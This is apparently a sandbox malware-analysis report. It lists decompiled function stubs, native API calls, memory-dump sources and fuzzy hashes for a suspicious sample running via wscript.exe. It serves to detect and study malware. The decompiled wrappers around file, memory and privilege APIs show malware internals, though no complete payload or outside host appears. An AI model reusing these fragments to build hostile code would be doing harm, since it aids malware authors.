Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a3f3ee3cb9ffbb11adea4fbc12c88e3e6e8334bc09bffa8ae53608e8eb042dd8
Instruction ID: e5332348da5b59533d6ade47f11be478ceaf701206163b642f5670b3d75938cc
Opcode Fuzzy Hash: a3f3ee3cb9ffbb11adea4fbc12c88e3e6e8334bc09bffa8ae53608e8eb042dd8
Instruction Fuzzy Hash: 28F0A9B2200215AFDB20CF14CC88EEBB769EF85314F0081A8FD08AB241DA31A850CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004188D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191C0(_a4, _a4, _t3,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188df
0x004188e7
0x004188fd
0x00418901

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 004188FD

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 2a8b4d01c77f57f9537e4a8c9056324bca9a4fb502523cc2798246bee73f8781
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: D7E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FA085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A30, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A30(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E004191C0(_a4, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a4a
0x00418a60
0x00418a64

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A60

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: fa95252e36870a94604636740fee15c405cfb0840f5ac42baad6929b42f97f84
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 1AE01AB12002086BDB10DF49CC85EE737ADAF89650F018555FA0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418910, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418910(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E004191C0(_a4, _t5, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418913
0x0041892a
0x00418938

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418938

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ebe942e9f85fd7778464d46fb55928cc225e25ca24bfac27d2b1ada9d5edf0ef
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 09D012716002147BD620DB99CC85FD7779CDF49750F018465BA1C5B241C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418902, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418902(int _a4) {
				intOrPtr _v0;
				void* _t13;
				signed int _t15;

				_push(es);
				asm("wait");
				_t15 =  *(_t13 + 6) * 0x8bec8b55;
				_push(_t15);
				_t7 = _v0;
				_push(_t13);
				E004191C0(_v0, _t7, _v0 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}

0x00418902
0x0041890a
0x0041890d
0x00418910
0x00418913
0x0041891c
0x0041892a
0x00418938

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418938

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3eff6399784c95a37879c2e5df9049601b14c8bc323049bdb386d7b661a0e191
Instruction ID: 6b97c1c272066a10d9ae5db07586b327e2da51441593cc28def281dcf72283c0
Opcode Fuzzy Hash: 3eff6399784c95a37879c2e5df9049601b14c8bc323049bdb386d7b661a0e191
Instruction Fuzzy Hash: C9E0C2751197013BCB20EB648DC6EC77BA8DF05340F148D5FE8A99B243C138F64086A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: wscript.exe PID: 3576 Parent PID: 6936 wscript.exeCOMMON

Executed Functions

Function 009A85C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,009A3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009A3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 009A860D

Strings

.z`, xrefs: 009A85FD, 009A8608

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 3857fcc8ed2e8ca953d4b0129b15386fdee1c627acdecef63355a2db9890791f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 5BF0BDB2204208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 009A866E, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(009A3D72,5E972F65,FFFFFFFF,009A3A31,?,?,009A3D72,?,009A3A31,FFFFFFFF,5E972F65,009A3D72,?,00000000), ref: 009A86B5

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 11d34d3fbc074ae6b6fe2a1b2a544983719427099de6fd87a9802b4ccae1768e
Instruction ID: 6062d422d2097b57d98333d99343c3b85ab84dead9b1368f066cff0df3e09a46
Opcode Fuzzy Hash: 11d34d3fbc074ae6b6fe2a1b2a544983719427099de6fd87a9802b4ccae1768e
Instruction Fuzzy Hash: 6BF0A4B6204108AFCB14DF99DC85EEB77A9AF8C754F158648FE1DA7251D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009A8670, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(009A3D72,5E972F65,FFFFFFFF,009A3A31,?,?,009A3D72,?,009A3A31,FFFFFFFF,5E972F65,009A3D72,?,00000000), ref: 009A86B5

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 19d12a694fad3ab53472bbb1a6e549a56740c623e7894e188ca2248782924e29
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 20F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158648BA1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009A879A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00992D11,00002000,00003000,00000004), ref: 009A87D9

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: bda133b4caf38dff02bf552687992700eaef281ceffe99759f5b8c8556e85bbb
Instruction ID: ab9e13e9ef8cd88cceee5425c31042cf0e8ba373fcb9a157c6bab9a6b8cfbbf2
Opcode Fuzzy Hash: bda133b4caf38dff02bf552687992700eaef281ceffe99759f5b8c8556e85bbb
Instruction Fuzzy Hash: EEF0F8B2614218BFDB14DF99CC81EEB77ADEF88350F118559FE09A7241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009A87A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00992D11,00002000,00003000,00000004), ref: 009A87D9

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 1a7b8402fbaec33b71f87728f70e45551093c91f1731fe33beb5ddfef1eb9788
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 71F015B2200208ABCB14DF89CC81EAB77ADAF88750F118548BE0897241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 009A86F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(009A3D50,?,?,009A3D50,00000000,FFFFFFFF), ref: 009A8715

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 107f6f63ab3846ba54cdf837c0de2e46aa2effc7fe678d988963caacdd00dac1
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: EFD01776200214ABDB10EB98CC89FA77BACEF88760F154499BA189B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA986A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ebfaa25482caa4e08a4eb05ca7cf4ddfdf2a7c91af31dbf4adae0b264c9267b
Instruction ID: e7950c3433139248271d26414b07d74cf585353cdd9f5f01992acd5879275b01
Opcode Fuzzy Hash: 6ebfaa25482caa4e08a4eb05ca7cf4ddfdf2a7c91af31dbf4adae0b264c9267b
Instruction Fuzzy Hash: BD90027220100413F15261594504757000DD7D0285F91C466A0815558DD6DAE962B1A1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA984A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b9b37c88474a5df438382aa64760e555abb88844afe803de594aa54f9f7e21c6
Instruction ID: f875f7d0bf55d1eb97ee7f6f13edde128104c4120724e67481428c3b64abc1ab
Opcode Fuzzy Hash: b9b37c88474a5df438382aa64760e555abb88844afe803de594aa54f9f7e21c6
Instruction Fuzzy Hash: 14900262242041537586B1594404557400AE7E0285791C066A1805950CC5AAF866E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA99AA

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 935b136dd94b5a28c2f7135759e108fddd5794031e5b29f660d566efaed7dc0a
Instruction ID: 84de3be45ba9f8714bdb1ad2e8016d5294e992a7130563fd6d7709e9ef98620a
Opcode Fuzzy Hash: 935b136dd94b5a28c2f7135759e108fddd5794031e5b29f660d566efaed7dc0a
Instruction Fuzzy Hash: 0A9002A234100443F14161594414B560009D7E1345F51C069E1455554DC69DEC6271A6

Uniqueness

Uniqueness Score: -1.00%

Function 04BA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA95DA

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c0b2dda41d39ac2c3f0a0e5ae2d7412cf79aa79dcebb072d7290117f7ee3ff1
Instruction ID: 635b2f10e4baa2c006fa759c98edaca9dbdc925c8583cd4fd3a89a25ca6c0443
Opcode Fuzzy Hash: 3c0b2dda41d39ac2c3f0a0e5ae2d7412cf79aa79dcebb072d7290117f7ee3ff1
Instruction Fuzzy Hash: BA9002A220200003614671594414666400ED7E0245B51C075E1405590DC5A9E8A171A5

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA991A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86631accb26af44586e5fa61eb03d66b4d41a34185a7d1527b8b8725d31f7200
Instruction ID: 01499a747fd31bd945e9c31f6dd65ddb7c5900d648ef9c15021178e09ae12144
Opcode Fuzzy Hash: 86631accb26af44586e5fa61eb03d66b4d41a34185a7d1527b8b8725d31f7200
Instruction Fuzzy Hash: FF9002B220100403F181715944047960009D7D0345F51C065A5455554EC6DDEDE576E5

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA954A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: adb2b37cee4027295284a1f0887ec5734c5c142803b2dcf084b52bbe022b5a0b
Instruction ID: b02661d2d83e9fa66516cc547e9f484dac3a5dba8018821ab3813af2c06f559c
Opcode Fuzzy Hash: adb2b37cee4027295284a1f0887ec5734c5c142803b2dcf084b52bbe022b5a0b
Instruction Fuzzy Hash: 0D900266211000032146A5590704557004AD7D5395351C075F1406550CD6A5E87161A1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA96EA

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5915effaa95dc7e5f1c613cec1cbd0181eca1cd52488ca3ca53538f4e8d3212d
Instruction ID: 101f535d6ccd9f597c65d2e3a1299ecdb05bbff2f26b4e00ba8a3ef5f8fc298b
Opcode Fuzzy Hash: 5915effaa95dc7e5f1c613cec1cbd0181eca1cd52488ca3ca53538f4e8d3212d
Instruction Fuzzy Hash: 7490027220108803F1516159840479A0009D7D0345F55C465A4815658DC6D9E8A171A1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA96DA

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e7a3e16eebefb603ba795d575c3f38f014e60195fa1683ed1ebf896ab38455f4
Instruction ID: 142552e3051a034201e049b37bc745bff881100f2a58d573f138c4223c8c4b7a
Opcode Fuzzy Hash: e7a3e16eebefb603ba795d575c3f38f014e60195fa1683ed1ebf896ab38455f4
Instruction Fuzzy Hash: D890027220100843F14161594404B960009D7E0345F51C06AA0515654DC699E86175A1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA966A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 16c128e9a50e2d7893d90eed860d9c8656db57cd925fee9f1f4445c79b67eacf
Instruction ID: bf70f71e1210e978a2d2b9fc859e00e124a9b36c22a27c25e2693fb6bd429552
Opcode Fuzzy Hash: 16c128e9a50e2d7893d90eed860d9c8656db57cd925fee9f1f4445c79b67eacf
Instruction Fuzzy Hash: F690027220100803F1C17159440469A0009D7D1345F91C069A0416654DCA99EA6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA965A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a88126854fae50d24a57b4bbc6bd76fba8b39c3df1aec1900904b5698786349
Instruction ID: 1c00292324c4be883fae03776895dc1889a38e2758ee222b42d49eb2ffb87ba1
Opcode Fuzzy Hash: 6a88126854fae50d24a57b4bbc6bd76fba8b39c3df1aec1900904b5698786349
Instruction Fuzzy Hash: 1290027220504843F18171594404A960019D7D0349F51C065A0455694DD6A9ED65B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA9A5A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d32c5d176a3a04643e50f85a9808faeba197ddf81e2218edc8960238603e3f88
Instruction ID: 6b23419e2088cb67c40d77986ebd03ea4bf72d8e8e6b0bc656fb96f6c7e04506
Opcode Fuzzy Hash: d32c5d176a3a04643e50f85a9808faeba197ddf81e2218edc8960238603e3f88
Instruction Fuzzy Hash: 6690026221180043F24165694C14B570009D7D0347F51C169A0545554CC999E87165A1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA978A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 081d767616ce0a3eec06a98f7e951c8f83db0cfea05eab8946dc7f2f042a93b0
Instruction ID: 78f82c99991913fc540f2867710dc8f9bb762a70a282c88cb411ca59e387d8cd
Opcode Fuzzy Hash: 081d767616ce0a3eec06a98f7e951c8f83db0cfea05eab8946dc7f2f042a93b0
Instruction Fuzzy Hash: 1E90026A21300003F1C17159540865A0009D7D1246F91D469A0406558CC999E87963A1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA9FEA

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3cd3666aeca58428256ab54894aae61451a4decf77717cbe7a07c00c2b87bed
Instruction ID: 4f5a85ea5d1fcfd453d6ad20127ffdfdb01cf83ce906f1ee977382d25f382c2c
Opcode Fuzzy Hash: f3cd3666aeca58428256ab54894aae61451a4decf77717cbe7a07c00c2b87bed
Instruction Fuzzy Hash: BA90027231114403F151615984047560009D7D1245F51C465A0C15558DC6D9E8A171A2

Uniqueness

Uniqueness Score: -1.00%

Function 04BA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA971A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8f8502f82fa06b6458ab5d7da1fe3b9c244bb6d1ecc042dc7d05833519fe4c2
Instruction ID: 2d98195c69bc9d370743e951f6b455cb84dd90ed01de6981fcaa0419ade43184
Opcode Fuzzy Hash: c8f8502f82fa06b6458ab5d7da1fe3b9c244bb6d1ecc042dc7d05833519fe4c2
Instruction Fuzzy Hash: 8790027220100403F141659954086960009D7E0345F51D065A5415555EC6E9E8A171B1

Uniqueness

Uniqueness Score: -1.00%

Function 009A72E0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 009A7388

Strings

wininet.dll, xrefs: 009A733E, 009A7347
net.dll, xrefs: 009A7351, 009A73D7, 009A73AF, 009A73BB, 009A73E3

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: c6cd9274709fb060c6c79814932ef0ce8d77b4b8f3d82b1dd2e5e18c00d8123b
Instruction ID: d23d0677884a0a31283bd89641016ade37ea9b097a8ccc1fba923f56d2e17218
Opcode Fuzzy Hash: c6cd9274709fb060c6c79814932ef0ce8d77b4b8f3d82b1dd2e5e18c00d8123b
Instruction Fuzzy Hash: 9B3190B6505600ABC715DFA8DCA2FABF7B8EF89700F00851DFA1A9B241D730A545CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009A72D7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 009A7388

Strings

wininet.dll, xrefs: 009A733E, 009A7347
net.dll, xrefs: 009A7351, 009A73AF, 009A73BB

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 277bb95ec31f0a1d9730123f37efe99f7c35c8a221f0a066b99a173403bb2d7d
Instruction ID: 98f3a6033f51f2b342ac98f5422b9625492b8fe3b3774592f2016ed5c9bf51f1
Opcode Fuzzy Hash: 277bb95ec31f0a1d9730123f37efe99f7c35c8a221f0a066b99a173403bb2d7d
Instruction Fuzzy Hash: 8431AEB2505204ABCB10DFA8DCA2F6BF7A8EF89700F10811DFA199B241D774A855CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009A88C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00993B93), ref: 009A88FD

Strings

.z`, xrefs: 009A88EC, 009A88F8

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 54e7fbc80c14ad6a143700dae03c6e30a2826b6db8a7aaec0d90cbc8b035d365
Instruction ID: 2eeb0036eff92f75df3e5e8490a575cea7a4c642142c8572e19c9a8ad199a7ed
Opcode Fuzzy Hash: 54e7fbc80c14ad6a143700dae03c6e30a2826b6db8a7aaec0d90cbc8b035d365
Instruction Fuzzy Hash: F9E092752142146BCB14DF58CC4AEDB7769EF88751F118554FD089B342C631E912CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 009A88D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00993B93), ref: 009A88FD

Strings

.z`, xrefs: 009A88EC, 009A88F8

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: c5bff70cf197ba23f2d4142358ab998d73719cfb704db02a4956103d9cf08a7b
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 22E046B1200208ABDB18EF99CC89EA777ACEF88750F018558FE085B242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00997280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

